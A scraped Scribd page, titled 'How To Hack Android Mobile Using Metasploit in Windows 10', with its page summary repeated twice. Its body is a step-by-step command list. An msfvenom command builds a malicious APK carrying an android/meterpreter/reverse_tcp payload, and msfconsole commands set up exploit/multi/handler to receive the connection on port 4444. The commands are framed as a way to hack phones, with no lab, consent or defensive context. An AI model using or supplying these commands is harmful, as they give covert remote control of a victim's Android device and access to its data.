0% found this document useful (0 votes)
1K views

How To Hack Android Mobile Using Metasploit in Windows 10

This document provides instructions for generating a malicious Android APK file using msfvenom that establishes a reverse TCP meterpreter connection, and then starting msfconsole to handle the connection on the specified LHOST and LPORT. The steps are to: 1) Use msfvenom to generate an APK with a reverse TCP payload; 2) Start msfconsole and use the multi/handler exploit to listen on LHOST and LPORT for the connection.

Uploaded by

adam Iskandar
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
1K views

How To Hack Android Mobile Using Metasploit in Windows 10

This document provides instructions for generating a malicious Android APK file using msfvenom that establishes a reverse TCP meterpreter connection, and then starting msfconsole to handle the connection on the specified LHOST and LPORT. The steps are to: 1) Use msfvenom to generate an APK with a reverse TCP payload; 2) Start msfconsole and use the multi/handler exploit to listen on LHOST and LPORT for the connection.

Uploaded by

adam Iskandar
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 1

Open CMD and type this:

1.msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT=4444 R>Hack.apk


2.After done close the cmd
3.Refresh the desktop

Open new CMD and type:

1.msfconsole

2.use exploit/multi/handler

3.set payload android/meterpreter/reverse_tcp

4.set LHOST

5.set LPORT 4444

6.exploit

You might also like